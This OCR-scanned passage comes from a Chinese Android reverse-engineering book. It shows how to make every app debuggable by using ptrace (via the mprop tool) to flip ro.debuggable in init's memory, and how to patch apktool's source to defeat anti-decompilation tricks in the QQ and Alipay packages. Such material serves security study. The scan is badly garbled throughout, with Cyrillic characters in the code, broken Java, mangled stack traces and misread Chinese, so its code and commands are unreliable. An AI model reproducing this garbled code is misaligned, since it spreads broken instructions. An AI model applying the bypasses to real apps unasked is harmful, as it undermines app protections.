到 ， 葡 是 进程 注入 技术 。 可 以 使 用 ptrace 注 入 到 init 进 程 ， 然 后 修改 内 存 中 的 这 些 属性 值 ， 只 要 init 进 程 不 重启 的 话 ， 那 么 这 些 属 
性 值 束 会 起 效 。 好 了 ， 这 个 万 法 可 以 尝试 ， 但 是 这 个 万 法 有 一 个 浆 新 ， 就 是 如 果 init 进 程 挂 了 重启 的 话 ， 那 么 设置 束 没 有 任何 效 
果 了 ， 必 须 重 新 操作 了 ， 所 以 有 效 期 不 是 很 长 ,但 是 一 般 情况 下 只 要 保证 设备 不 重启 的 话 ，init 进 程 会 一 直 存 在 的 ， 而 且 如 果 友 
生 了 init 进 程 挂 挥 的 情况 ， 那 么 设备 肯定 会 重启 的 。 到 时 候 再 重新 操作 一 下 即 可 。 


上 面 的 三 种 方式 设置 系统 中 的 调试 属性 总 开关， 最 后 一 种 方式 是 最 靠 谱 的 。 而 且 思 路 也 很 简单 ， 但 是 不 用 重新 去 写 这 个 代码 
逻辑 的 ， 因 为 网 上 已 经 有 这 个 工具 了 ， 这 个 工具 叫做 mprop， 是 一 个 执行 文件 。 用 法 很 简单 ， 诈 移 把 可 执行 文件 nprop 拷 贝 到 
设备 中 的 目录 下 ， 然 后 运行 命令 ， 如 下 所 示 : 


./mprop ro.debuggable 1 
rootGpisces:/data # ./mprop ro.debuggable 1 


这 个 工具 可 以 修改 内 存 中 所 有 的 属性 值 ， 包 括 机 型 信息 。 修 改 完成 和 之后， 使 用 getprop 命 令 册 查看 值 ， 友 现 修改 成 功 了 ,但 
是 需要 注意 的 是 ， 修 改 的 是 内 存 的 值 ， 而 不 是 文件 中 的 值 。 所 以 default.prop 文 件 中 的 内 容 是 没有 友 生 变化 : 


patching it at:0x40169ad4[0xb6f10acc], value:[0x00000031 -> 0x00000031] 
patching it at:0x40169ad0[0xb6fl10ac8], value:[0x01000000 -> 0x01000000] 
patched, reread: [0хрб#10асс] => 0x00000031 

patched, reread: [0xb6f10ac8] => 0x01000000 

root [@pisces:/data # getprop ro.debuggable |< 在 这 里 看 到 修改 成 功 了 

1 

root@pisces:/data # cat /default.prop 


# 

# ADDITIONAL_DEFAULT_PROPERTIES 

# 

Tas PECUT ESL 但 是 这 里 的 default.prop 文件 中 的 值 


ro.allow.mock.location=0 没有 修改 ， 因 为 只 是 修改 了 内 存 中 的 


ro.adb.secure=1 | j | Ө 
ro.debuggable=0 属性 值 ， ix 影 啊 到 文件 中 的 内 容 
persist.sys.usb.config-mtp 
persist.sys.timezone-Asia/Shanghai 

rootGapisces:/data # 


这 时 候 ， 可 以 使 用 Eclipse 的 PDM 来 查看 可 以 调试 的 应 用 列表 ， 如 图 15-1 所 示 。 


国 Devices > н | | 
Name 
. Bb xiaomi-mi 3-f0d49912 = online 444 


图 15-1 Eclipse 中 DDMS 查 看 应 用 列表 
当然 也 可 以 使 用 adb jdwp 命 令 来 查看 可 以 调试 的 进程 id， 如 下 所 示 : 


C:NUsersNjJlangweil-g>adb jdwp 
7090 


但 是 可 惜 的 是 ， 友 现 还 是 没有 展示 设备 中 所 有 的 应 用 ， 其 实 这 里 是 有 一 个 细 忆 问题， 虽然 修 改 了 内 存 值 ， 但 是 有 一 个 进程 需 


要 重启 一 下 ， 哪 个 进程 呢 ? 就 是 adbd 这 个 进程 ， 这 个 进程 是 adb 的 守护 进程 ， 就 是 设备 连接 信息 传输 后 台 进 程 ， 所 以 想 看 到 可 
以 调试 的 进程 信息 的 话 ， 那 么 需要 重 局 这 个 进程 ， 这 样 连接 信息 才 会 更 新 。 


重 局 这 个 进程 很 简单 ， 直 接 使 用 命令 即 可 ， 如 下 所 示 : 


stop; start 


其 实 这 是 两 个 命令 ， 用 分 号 隔 开 ， 首 先是 干掉 进程 ， 然 后 重启。 运行 完 命 令 之 后 ， 表 去 看 DDMS 窗 口 信息 ， 如 图 15-2 所 


С] | 
2 
° 


Name 


ү 国 xiaomi-mi. 3-f0d49e12 


system process 
com.tianqiwhite 
com.mliul.core 
android.process.media 
com.miul.home 


com.tianqiwhite:newbroadcast 


com.kingroot.kinguser:service 


com.sahu.inputmethad.sogau 


.Dbaidu.map.location 


com,.anadreim.pnaene 


i com.xiaomti.finddevice 


这 时 候 所 有 的 应 用 进程 都 是 可 以 调试 的 了 ， 再 使 用 dumpsys package 命 令 查看 一 个 应 用 的 包 信 息 ， 


сот.тішмһеёѕопе 
com.android.nfc 
com.xiaomi.xmst 
com.miui.systemAdSolution 
com.miul.securitycenter 
com.miul.powerkeeper:service 
com.xiaomi.metok 
com.Ibe.securrty.miui 
com.qihoo.daemon 
com.android.defcontainer 
android.process.acore 
com.nvidia.NvCPLSvc 


com.miui,netwarkassistant:deamon 


com.android.ncallui 


com.miui.antispam:provider 


com.android.systemul 


com.qihoo. € — PluginPO1 


com.miui.networkassistantishandow 


com.androaid.fileexplorer:iremote 


图 15-2 Eclipse 中 DDMS 界 面 展 示 可 调式 应 用 列表 


Online 
9051 

9978 

10063 
10121 
10152 
10298 
10337 
10365 
10374 
10405 
10418 
10426 
10441 
10454 
10472 
10925 
10957 
10988 
11064 
11143 
11154 
11262 
11275 
11287 
11373 
11630 
11668 
11769 
11955 
12266 
12414 


— 44.4 


如 下 所 示 : 


6662 
6665 
6673 
6675 
6676 
6677 
6678 
6679 
6660 
66683 
3700 
8701 
8702 
6703 
5/04 
3/08 
5/09 
5/10 
8712 
6713 
5/14 
6716 
8717 
5/19 
6723 
10258 
6666 
10259 
10261 
10264 
10263 


Packages: 


Package [com.baidu.map.location] (42ер24р8): 
userId-10036 Qids=[1029, 1015, 3003] 
pkg-Package(í430182e0 com.baidu.map.location) 
codePath-/system/app/BaiduNetworkLocation.apk 
resourcePath-/system/app/BaiduNetworkLocation.apk 
nativeLibraryPath-/data/app-lib/BaiduNetworkLocation 
versionCode-31 targetSdk-23 
versionName-3.1.1 
applicationrinfo-ApplicationlInfo(43018390 com.baidu.map.location) 
flags-[ SYSTEM HAS CODE ALLOW BACKUP |] 
dataDir-/data/data/com.baidu.map.location 
supportsScreens-[small, medium, large, xlarge, resizeable, anyDensity] 
usesLibraries: 

com.android.location.provider 


可 以 看 到 ， 这 个 应 用 的 flags 标 志 中 并 没有 debuggable 属 性 值 ， 但 是 这 个 应 用 是 可 以 调试 的 。 


第 16 章 ” 反 编 译 神 器 apktool 和 Jadx 


apktool 工 具 是 开源 的 ， 也 是 用 Java 语 言 开发 的 ， 代 码 相对 简单 ， 本 章 就 来 分 析 一 下 它 的 大 体 逻 辑 。 分 析 这 个 工具 的 原因 只 有 
一 个 ， 就 是 在 之 前 的 反 编译 过 程 中 可 以 发 现 ， 总 是 有 一 些 apk 应 用 不 那么 轻易 地 被 反 编译 ， ow 
的 混 清 工作， 所 以 需要 通过 分 析 源 码 来 解决 这 些 异 常 ， 从 而 对 每 个 apk 的 反 编译 都 能 如 鱼 得 水 。 本 章 还 介绍 一 个 分 析 工 具 Jadx， 它 
能 更 高 效 地 分 析 apk。 


16.1 SEIER FII 


当 对 一 个 apk 进 行 破解 之 前 ， 会 做 如 下 两 件 事 : 


- 用 压缩 软件 解压 apK， 得 到 classes.dex， 然 后 使 用 dex2jat+jd-gui 工 具 碍 看 代码 逻辑 。 但 是 这 里 会 发 现 资源 文件 如 
AndtoidManifest.xml 和 tes 下 面 的 XML 文件 都 是 乱码 的 ， 因 为 它们 遵循 Andtoid 中 的 atfsc 文 件 格式 ， 关 于 这 个 文件 格式 在 之 前 几 章 已 
经 详细 介绍 过 了 。 其 实 不 管 是 什么 文件 格式 ， 都 有 文件 格式 的 说 明文 档 ， 只 要 按照 说 明文 档 去 做 解析 即 可 。 


- 使 用 apktool 工 具 反 编 译 apK， 得 到 smali 源 码 和 资源 文件 。smali 语 法 是 Andtoid 讶 拟 机 识别 执行 的 指令 代码 ， 和 dex 文 件 可 以 相 
互 转 化 ， 使 用 baksmali.jat 和 smali.jat 这 两 个 工具 即 可 。 当 然 这 里 还 可 以 得 到 所 有 的 资源 文件 ， 即 atsc 格 式 解析 之 后 的 内 容 ， 而 且 这 
个 工具 可 以 实现 回 编译 ， 这 个 功能 也 是 很 强大 的 ， 不 过 后 面 分 析 源 码 就 知道 了 ， 回 编译 其 实 是 借助 aapt 这 个 强大 的 系统 命令 来 完 
成 的 。 可 以 看 到 如 果 想 要 完全 分 析 一 个 apk，apktool 工 具 是 不 可 或 缺 的 ， 它 是 开启 破解 大 门 的 钥匙 ， 这 个 工具 也 是 逆向 领域 的 项 
门 砖 ， 而且 现在 很 多 可 视 化 的 破解 工具 的 核心 都 是 使 用 apktool+dex2jart+jd-gui 这 三 个 工具 组 成 的 ， 只 是 后 期 做 了 一 定 的 界面 优 
化 。 


162 Бант ПАУЕЛ 


音 误 提示 : 


Exception in thread "main" brut.androlib.AndrolibException: Multiple res specs: 
attr/name 


主要 是 因为 利用 了 apktool 的 一 个 漏洞 ， 做 了 属性 id 的 混淆 ， 如 下 所 示 。 


C:NUsersNjiangweil-gNDesktopNAndroid 中 的 动态 调试 >java -jar apktool.jar а qq.apk 

-о аа 
I: Using Apktool 2.0.0-RC4 on qq.apk 
I: Loading resource table... 


Exception in thread 


attr/name 


at 
at 
at 
at 
at 
at 
at 
at 


at 


ас 


at 
at 
at 
at 
at 


brut 
brut 
brut 
brut 
brut 
brut 
brut 
brut 


.androlib 


.androlib 


.dnadrolib, 
.androlib. 
.androlib. 
.androlib. 


.androlib. 
.androlib. 


еѕ.јауа:622) 


DIU 


androlib 


java:73) 


brut. 


androlib. 


java:65) 


DrOC 
brut 
brut 
brut 
brut 


.androlib. 
.androlib. 


.res.decoder 


"main" brut.androlib.AndrolibException: Multiple res specs: 


res.data.ResType.addResSpec (КеѕтТуре.јауа: 58) 


res.decoder. 
res.decoder 
res.decoder 


res.decoder 
res.decoder 


ARSCDecoder 


.-ARSCDecoder. 
.-ARSCDecoder. 
.ARSCDecoder. 
.ARSCDecoder. 
.-ARSCDecoder. 
.res.AndrolibResources.getResPackagesFromApk(AndrolibResourc 


.readEntry (ARSCDecoder.java:213) 
readConfig(ARSCDecoder.java:188) 
readType (ARSCDecoder.java:156) 
readPackage(ARSCDecoder.java:113) 
readTable(ARSCDecoder.java:78) 
decode(ARSCDecoder.java:47) 


.res.AndrolibResources.loadMainPkg(AndrolibResources. 


res.AndrolibResources.getResTable(AndrolibResources. 


Androlib.getResTable(Androlib.java:96023) 
ApkDecoder.setTargetSdkVersion(ApkDecoder.java:209) 


.apktool.Main.main(Main.java:81) 


.androlib.ApkDecoder.decode(ApkDecoder.7java:92) 
.apktool.Main.cmdDecode(Main.java:165) 


C:NUsers M jiangweil-gNMDesktop M Android 中 的 动态 调试 > 


2. 第 二 类 问题 


错误 提示 : 


Exception in thread "main" brut.androlib.AndrolibException: Could not decode 
arsc file 


这 是 在 使 用 apktool 工 具 时 报错 最 多 的 错误 ， 主 要 是 利用 apktoo| 的 漏洞 ， 修 改 了 resource.arsc 的 头 部 信息 ， 如 下 所 示 : 


C:NUsersNjiangweil-gNDesktopNAndroid 中 的 动态 调试 >java -jar apktool.jar d zhifubao. 
apk -о zhifubao 

I: Using Apktool 2.0.0-RC4 on zhifubao.apk 

I: Loading resource table... 

Exception in thread "main" brut.androlib.AndrolibException: Could not decode 
arsc file 
at brut.androlib.res.decoder.ARSCDecoder.decode(ARSCDecoder.java:52) 
at brut.androlib.res.AndrolibResources.getResPackagesFromApk(AndrolibResourc 


еѕ.јауа: 622) 
at brut.androlib.res.AndrolibResources.loadMainPkg(AndrolibResources. 
java:73) 
at brut.androlib.res.AndrolibResources.getResTable(AndrolibResources. 
java:65) 
at brut.androlib.Androlib.getResTable(Androlib.java:603) 
at brut.androlib.ApkDecoder.setTargetSdkVersion(ApkDecoder.java:209) 
at brut.androlib.ApkDecoder.decode(ApkDecoder.java:92) 
at brut.apktool.Main.cmdDecode (Main.java:1605) 
at brut.apktool.Main.main(Main.java:81) 
Caused by: java.io.lIOException: Expected: 0x001c0001, got: 0x00000001 
ас brut.util.ExtDatalnput.skipCheckChunkTypeInt(ExtDatalInput.java:75) 
at brut.util.ExtDatalInput.skipCheckChunkTypeInt (ExtDatalnput.java:723) 
at brut.androlib.res.decoder.StringBlock.read(StringBlock.java:44) 
at brut.androlib.res.decoder.ARSCDecoder.readTable(ARSCDecoder.Jjava:73) 
ас brut.androlib.res.decoder.ARSCDecoder.decode(ARSCDecoder.java:47) 


8 more 


C:NUsersNMjiangweil-gMDesktopM Android 中 的 动态 调试 > 


C:NUsersNjiangweil-gNDesktopNAndroid 中 的 动态 调试 >java -jar apktool.jar -version 

2.0.0-RC4 

这 个 版 本 是 最 新 的 了 。 皮 编译 失败 的 原因 是 应 用 开 友 公司 知道 了 apktool 工 具 反 编译 的 厉害 ， 所 以 去 看 apktoo| 的 源码 ， 分 
析 得 到 漏洞 ， 然 后 进行 apk 的 一 些 混淆 ， 防 止 反 编译 。 因 此 ， 防 护 和 破解 真 的 是 无 休止 的 战争 。 竹 好 apktool 的 代码 也 更 新 得 比 
较 快 ， 所 以 会 解决 这 些 漏洞 ， 但 是 在 破解 的 时 候 遇 到 这 些 间 题 ， 不 能 一 味 地 等 待 apktool 的 更 新 ， 既 然 是 开源 的 ， 那 么 就 直接 分 
析 源 码 ， 友 现 报错 的 地 方 修复 即 可 。 
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反 编 译 也 会 出 现 错误 ， 本 节 分 析 并 和 解决 这 类 问题 。 


1. 第 一 类 反 编 译 错误 


错误 信息 如 图 16-4 所 示 。 


@ Javadoc |ë, Declaration EJ Console 3 = Progress Ж LogCat $F Debug 
<terminated> Main (2) [Java Application] C:\Program Ее5\Јауа\ғе1.8.0 92Ып\ауам,ехе [2016 年 6 月 14 日 F#F3:22:55) 


I: Using Apktool @version@ on qq.apk 
I: Loading resource table... 
pkgcount:1 
Exception in thread "main" brut.androlib.AndrolibExcepti 1 | 
at brut.androlib.res.data.ResTypeSpec. adáResSpd (Res TvpeSpec. java: 82) 
at brut.androlib.res.decoder.ARSCDecoder.readEntry(ARSCDecoder-:]ava:4259) 
at кы алдай. bie арч tita tal pr Pd AS rm m јама:220) 
at brut.androlib.res.decoder.ARSCDecoder.readTableTypeSpec(ARSCDecoder. java:156) 
at brut.androlib.res.decoder.ARSCDecoder.readTablePackage(ARSCDecoder.java:118) 
at brut.androlib.res.decoder.ARSCDecoder.readTableHeader(ARSCDecoder. java: 80) 
at brut.androlib.res.decoder.ARSCDecoder.decode(ARSCDecoder. java: 47) 
at brut.androlib.res.AndrolibResources.getResPackagesFromApk(AndrolibResources.]java:588) 
at brut.androlib.res.AndrolibResources.loadMainPkg(AndrolibResources.]java:97) 
at brut.androlib.res.AndrolibResources.getResTable(AndrolibResources.]java:89) 
at brut.androlib.Androlib.getResTable(Androlib.java:64) 
at brut.androlib.ApkDecoder.setTargetSdkVersion(ApkDecoder.java:193) 
at brut.androlib.ApkDecoder.decode(ApkDecoder.java:102) 
at brut.apktool.Main.cmdDecode(Main.java:184) 
at brut.apktool.Main.main(Main.java:182) 


attr/name 


16-4 ” 反 编 译 错误 (一) 
报错 信息 和 开始 使 用 apktool 工 具 的 时 候 是 一 样 的 ， 看 看 月 演 代码 : 


public void addResSpec(ResResSpec spec) throws AndrolibException { 


if (mResSpecs.put(spec.getName(), spec) !- null) { 
throw new AndrolibException(String.format("Multiple res specs: $s/$s", 
getName(), spec.getName())); 
) 


可 以 友 现 ， 这 里 使 用 一 个 Map 结 构 存 放 ResResSpec 格 式 数 据 ， 而 且 key 是 spec 的 name 值 ， 那 么 知道 资源 id 的 值 是 唯一 的 ， 
可 能 出 现 相 同 的 name 值 ， 是 做 了 混淆 机 制 ， 这 种 混淆 机 制 只 对 apktool 工 具有 效 ， 对 Android 系 统 解析 apk 运 行 是 不 影响 的 。 
知道 了 月 演 的 原因 ， 修 复 也 就 简单 了 ， 直 接 加 一 个 判断 ， 判 断 这 个 key 是 否 在 map 中 ， 存 在 的 话 束 直接 返回 ， 如 图 16-5 所 示 。 


public void addResSpec(ResResSpec spec) throws AndrolibException í 


DORFET tres 5ресй в. 修复 gq 民 编 译 问题 
if(mResSpecs.containsKey(spec. Ret (api 


System.eut.println("res have name:"+getName()+"/"+spec.getName()); 
return; 


if (mResSpecs.put(spec.getName(), spec) !- null) { 
throw new AndrolibException(String.format("Multiple res specs: %5/%5' 


图 16-5 修复 问题 
再 次 运行 ， 如 图 16-6 所 示 。 


过 滤 了 重复 的 资源 值 ， 反 编译 成 功 了 。 这 里 因为 肥 编 译 过 程 中 会 用 到 系统 的 资源 id， 需 要 系统 资源 包 framework.apk 参 与 
解析 工作 ， 因 为 程序 包 比较 大 ， 反 编译 时 间 会 长 点 。 可 以 看 看 有 反 编译 之 后 的 目录 ， 如 图 16-7 所 示 。 


@ Javadoc (5 Declaration 0 Console 2: E Progress WB LogCat 1$ Debug 
<terminated> Main (2) [Java Application] CAProgram FlesWUavayre1.8.0 92Abinyavaw.exe (2016 年 6 月 14 日 23:28:35) 


have name:integer/name 
have name:integer/name 


have name:integer/name 这 是 因 为 项 日 中 会 用 1] Ра ЖЕМ. 的 一 些 T 


‚ have name:integer/name 


have name:integer/nme — 源 ， 所 以 需要 借助 系统 的 资源 包 来 参与 解 
have name:integer/name | . . : 
have name:integer/name 析 ， 这 个 资源 包 在 设备 的 framework.apk 中 
have name:integer/name 
|. have name:menu/name | 
I: Decoding_AndroidManifest.xml with resources... 
I: Loading resource table from file: C:\Users\jiangweil-g\apktool\framework\1.apk 
pkgcount : 
|I: Regular manifest package... 
Decoding file-resources...| 
Decoding values */* XMLs... 
Baksmaling classes.dex... 
Baksmaling classes2.dex... 
Baksmaling classes3.dex... 
Baksmaling classes4.dex... 
Baksmaling classes5.dex... 
Copying assets and libs... 
Copying unknown files... 
Copying original files... 


| el el ee ee ee ee el A a, 


4 Apktools 

$8 src 

BÀ JRE System Library [JavaSE-1.8] 
mà Referenced Libraries 


framework 
=> lib 

out 

b assets 
b g lib 


P 
b 
P 
Е 
р 
р 
4 


orginal 


res 


这 个 文件 很 
small _ 

smali classes2 H HF 
smali classes3 Jr [А] š 


smali classes4 ›-/ 
WT 


smali classes5 


图 16-7 回 编 译文 件 apktool.xml 


它 的 AndroidManifest.xm1l 内 容 如 下 : 


<?хт1 version-"1.0" encoding-"utf-8" standalone-"no"?» 
«manifest xmlns:android-"http://schemas.android.com/apk/res/android" 


android:installlocation-"auto" package-"com.tencent.mobileqq"» 

«supports-screens android:anyDensity-"true" 
android:largeScreens-"true" 
bndroid:normalScreens-"true" android:smallScreens-"true"/» 

"com.android.Launcher.permission.INSTALL SHORTCUT"/» 


«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 
€«uses-permission 
«uses-permission 
«uses-permission 
€«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 
«uses-permission 


android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 
android: 


name- 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 
name= 


"android. 
"android. 
"android. 
"android. 
"android. 
"android. 
"android. 
"android. 


permission. 
permission. 
.ACCESS_NETWORK_STATE"/> 


permission 


permission. 
permission. 
permission. 
permission. 
permission. 


INTERNET"/> 
VIBRATE"/» 


CHANGE CONFIGURATION" / > 
RECEIVE BOOT COMPLETED" / > 
WAKE LOCK"/» 

SYSTEM ALERT. NINDOW" / > 
RECORD AUDIO"/» 


"com.tencent.msf.permission.account.sync"/» 


"android. 
"android. 
"android. 
"android. 
"android. 
"android. 
"android. 


permission 


permission. 
permission. 
.ACCESS WIFI STATE"/» 


permission 


permission. 
permission. 
permission. 


.MODIFY AUDIO SETTINGS"/» 


CAMERA " / > 
CHANGE WIFI STATE"/> 


READ PHONE STATE"/» 
KILL BACKGROUND PROCESSES"/» 
CALL PHONE"/» 


"com.android.Launcher.permission.READ SETTINGS"/» 
name- "сот. android.Llauncher.permission.UNINSTALL SHORTCUT"/» 


解析 成 功 ， 可 以 正 弟 查看 了 。 这 里 融 解 决 了 反 编 译 的 错误 。 


2. 第 二 类 反 编 译 错 误 


销 误 信 息 如 图 16- ВЕТ. 


这 个 错误 和 开始 看 到 的 错误 是 一 样 的 ， 下 面 看 看 衣 溃 的 地 方 是 什么 原因 导致 的 : 

private ResPackage[] readTableHeader() throws IOException, AndrolibException { 
nextChunkCheckType (Header.TYPE TABLE); 
int packageCount - mIn.readInt(); 


System.out.println("pkgcount:"-«packageCount); 


mTableStrings = StringBlock.read(mIn); 
ResPackage[] packages = new ResPackage[packageCount]; 


nextChunk(); 
Lor {йк л = 9; 
packages[i 


: i < packageCount; i++) { 
] = readTablePackage(); 
} 


return packages; 


@ Javadoc |&, Declaration EJ Console 吕 Eg Progress 8 LogCat $F Debug 
«terminated» Main (2) [Java Application] CAProgram Files\Java\jre1.8.0_92\bin\javaw.exe [2016 年 6 月 14 日 F2F3:39:45) 
I: Using Apktool @version@ on zhifubao.apk 


I: Loading resource table... 
BEgcount: 1 


bestie. 1 in Eheead "main" brut. Tr ET Could not decode arsc file 
at brut.androlib.nres.decoder.ARSCDecoder.decode(ARSCDecoder. java:53) 
at brut.androlib.nres.AndrolibResources.getResPackagesFromApk(AndrolibResources.]java:588) 
at brut.androlib.nres.AndrolibResources.loadMainPkg(AndrolibResources.]java:97) 
at brut.androlib.nres.AndrolibResources.getResTable(AndrolibResources.]java:89) 
at brut.androlib.Androlib.getResTable(Androlib.]java:64) 
at brut.androlib.ApkDecoder.setTanrgetSdkVersion(ApkDecoder.java:193) 
at brut.androlib.ApkDecoder.decode(ApkDecoder. java: 102) 
at brut.apktool.Main.cmdDecode(Main.java:184) 
at brut.apktool.Main.main(Main.java:102) 
Caused by: java.io.IOException: Expected: 0x001c8001, 
at brut.uti1.ExtData3nnut.skipCheckChunkTypeI = java:74) 
at brut.util.ExtDataInput.skipCheckChunkTypeIht(ExtDataInput.]java:72) 
at brut.androlib.res.decoder.StringBlock.read atringhiock, Java:44) 
at brut.androlib.res.decoder.ARSCDecoder.read RSL 
at PRT E Nd Tava 
. 8 more 
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这 里 是 读 取 一 个 字符 串 音量 池 Chunk 头 部 信息 报错 的 ，stringChunk 的 头 部 信息 包括 如 下 内 容 : 
: header: 标准 的 Chunk 头 部 信息 结构 。 
' stringCount: 字符 串 的 个 数 。 


' styleCount: 字符 串 样 式 的 个 数 。 


flags: 字符 串 的 属性 ， 取 值 包 括 0x000 (UTF-16) 、0x001 (字符 串 经 过 排序 ) ~ 0x100 (UTF-8) 及 其 组 合 值 。 
 stringStart: 字符 串 内 容 块 相对 于 其 头 部 的 距离 。 
 stylesStart: 字符 串 样 式 块 相对 于 其 头 部 的 距离 。 
其 中 header 是 一 个 标准 的 Chunk 头 部 信息 : 
type: 当前 Chunk 的 类 型 (MAFF) o 
: headerSize: 当前 Chunk 的 头 部 大 小 (两 个 字 节 ) o 
' size: 当前 Chunk 的 大 小 (四 个 字 节 ) 。 
共 八 个 字 节 。 继 续 分 析 错 误 代码 : 


public static StringBlock read(ExtDatalnput reader) throws IOException { 
reader.skipCheckChunkTypeIlInt (CHUNK STRINGPOOL TYPE, CHUNK NULL ТҮРЕ); 
int chunkSize - reader.readInt(); 


// ResStringPool header 

int stringCount - reader.readInt(); 
int styleCount - reader.readInt(); 
int flags = reader.readInt(); 

int stringsOffset - reader.readInt(); 
int stylesOffset - reader.readInt(); 


这 里 会 检查 已 给 Chunk 结 构 的 完整 性 ， 输 入 的 StringPool 值 是 : 


// ResChunk header = header.type (0x0001) + header.headerSize (0x001C) 
private static final int CHUNK STRINGPOOL TYPE = 0x001C0001; 


下 面 是 字符 串 音 量 池 Chunk 的 头 部 信息 ， 而 且 值 是 固定 的 : 0x001C0001， 再 进入 看 看 代码 : 


public void skipCheckChunkTypeInt(int expected, int possible) throws IOException { 
int got - readInt(); 


LI (gót == possible) i 
SkipCheckChunkTypeInt (expected, -1); 
) else if (got !- expected) { 


throw new lIOException(String.format("Expected: 0x$08x, got: 0х%08х", expected, 


got) Js 


如 果 发 现 格 式 不 正确 就 抛 出 一 个 异常 ， 即 格式 不 是 0x001C0001 的 话 就 不 正确 。 那 么 问题 差不多 清楚 了 ， 有 崩 演 的 原因 很 可 能 
是 应 用 的 resource.arsc 的 stringPool 这 个 Chunk 的 头 部 信息 被 混 消 了 。 通 过 上 面 的 分 析 知 道 ，stringPool 这 个 Chunk 的 头 部 标 
准 格式 是 0x001C0001， 我 们 来 看 看 应 用 的 resource.arsc 文 件 的 二 进 制 数据 ， 如 图 16-9 所 示 。 


Startup — | resources rzhifubao.arzc|xX 
Edit As: Hex Run Script Run Template 


р: Ё! (= = BH Ll m, 


2 š п а F 
om == = "= тшшш == mm иш === ишш" [d mum 


ПП 01 00 OO 24 O2 ПП ПП QOO ПП OO OO 
23 00 00 OO 4F 00 00 00 79 00 00 OO 


= m m -- æ m=. J sb i i ii = ii mm ume, FL G"UE FR i FR GUAE T uU FE ii FE ii FL G"UE A] тч AE JG" FE GUAE FE ii 


图 16-9 ”分 析 tesoutce.atsc 头 部 信息 (—) 


可 以 友 现 有 这 个 值 ， 那 么 为 何 还 报错 呢 ? 到 这 里 或 许 不 知道 该 怎么 办 了 。 再 去 看 一 个 能 够 反 编译 的 apk 的 resource.arsc 文 
件 ， 如 图 16-10 所 示 。 


Startup . resources. arse Ш | resources_zhifubao, arse =| | resources zhifubao.arsc = arse 


Edit А5: Hex Run Script Run tennis 


0000h: | 
Oü010h: 
0020h: 
0030h: 
0040h: 


ъа С Mi x 


图 16-10 ”分 析 resoutce.arsc 头 部 信息 (二) 


发 现 果 然 不 一 样 ， 头 部 信息 多 了 8 个 字 节 0x000001000， 那 么 再 看 上 面 检 查 Chunk 头 部 类 型 数据 的 代码 : 


public void skipCheckChunkTypeInt(int expected, int possible) throws IOException 
int got = readInt(); 
if (got == possible) í 
skiptheckChunkTypeInt expected, -1); 


throw new IOException(String. Tormat(| Expected: @x%@8x, got: 0x9$08x", exp: 


可 以 看 到 ，apktoo| 其 实 已 经 做 了 头 部 信息 的 检查 ， 但 是 这 里 只 是 检查 0x001C0001 这 个 正确 信息 之 前 的 值 只 有 四 个 字 节 ， 
而 且 是 0 的 情况 ， 读 取 int 整 型 值 ， 四 个 字 节 ， кие кина ени 就 继续 执行 这 个 方法 ， 但 是 这 里 的 possible 
值 是 -1 了 ， 也 就 是 这 里 只 会 检查 四 个 字 节 ， 但 是 分 析 了 应 用 的 resource.arsc 文 件 ， 发 现 它 是 八 个 字 节 ， 而 且 还 不 全 是 0， 前 四 个 


—H () 


"Л Ж=0 ， 后 四 个 字 节 是 1: 


02 00 14 00 40 50 00 00 01 00 00 00 | 
(hi OO OO 0001 OO 1С OO EO 13 OO ОО £ 


所 以 这 里 检测 也 是 失败 的 ， 抛 出 异常 了 。 


分 析 完 资源 文件 混 清 的 机 制 ， 下 面 修改 融 简 单 了 ， 理 先 把 上 面 的 8 个 字 节 全 部 改 成 0: 


02 00 14 O0 40 50 00 00 01 00 OG OO 00 00 OUO бй 
oo оо оо оо 01 00 1C 00 EO 13 00 00 82 00 00 DO 


然后 蔡 换 之 前 的 resource.arsc 文 件 ， 和 直接 用 压缩 软件 替换 即 可 ， 然 后 表 修 改 上 面 的 检测 代码 ， 如 下 所 示 : 


public void skipCheckChunkTypeInt(int expected, int possible) throws IOException { 
int got - readInt(); 


if (got == possible) í I ЖЕТ 
SkipCheckChunkTypeInt(expected, /*-1*/possible); ню, 而 且 使 用 
} else if (got != expected) { possible 的 全 做 比较 


throw new IOException(String.format("Expected: 0x%08x, got: 0х%08х", 
expected, got)); 


修改 代码 ， 一 直 做 检测 ， 直 到 遇 到 正确 的 值 为 止 ， 修 复 完 成 之 后 ， 运 行 : 


I: Using Apktool @version@ on zhifubao.apk 

I: Loading resource table... 

pkgcount : 1 

І: Decoding AndroidManifest.xml with resources... 
I: Loading resource table from file: C:\Users\jiangweil-g\apktool\framework\1.apk 
pkgcount:1 

I: Regular manifest package... 

Decoding file-resources... 

Decoding values */* XMLs... 

Baksmaling classes.dex... 

Baksmaling classes2.dex... 

Baksmaling classes3.dex... 

Baksmaling с1аѕѕеѕ54. ех... 

Copying assets апа libs... 

Copying unknown files... 

: Copying original files... 


ч БЧ ЕЧ Ч MM NM M M. 


不 报错 了 ， 看 看 有 反 编 译 之 后 的 目录 : 


1 «?xml version-"1.0" encoding-"utf-8" standalone-"no"?» 
29 «manifest xmlns:android-"http://schemas.android.com/apk/res/android" 


3 bndroid:installLocation- "auto" 

4 package- "com.eg.android.AlipayGphone"» 

5 «supports-screens android:anyDensity-"true" android:largeScreens-"true" android:normalScre 
6 «uses-feature android:name-"android.hardware.camera" android:required-"false"/» 

7 «uses-feature android:name-"android.hardware.camera.autofocus" android:required-"false"/» 
8 «uses-permission android:name-"com.alipay.permission.ALIPAY UPDATE CREDENTIALS "/ > 

9 «uses-permission android:name-"com.android.Llauncher.permission.INSTALL SHORTCUT"/» 

10 «uses-permission android:name-"android.permission.BLUETOOTH"/» 

反 编 译 也 成 功 ! 


通过 上 面 的 分 析 可 见 ， 使 用 apktool 反 编译 的 问题 主要 有 两 个 : 
: Exception in thread ^ main" brut.androlib. AndrolibException: Multiple res specs: attr/name 
异常 原因 : 通过 分 析 源 码 知 道 ， 这 个 错误 主要 是 因为 apk 做 了 混淆 操作 ， 导 致 在 反 编 译 的 过 程 中 仔 入 了 重复 的 id 值 。 


错误 代码 : ResTypeSpec.java 的 addResSpec 万 法 78 行 。 


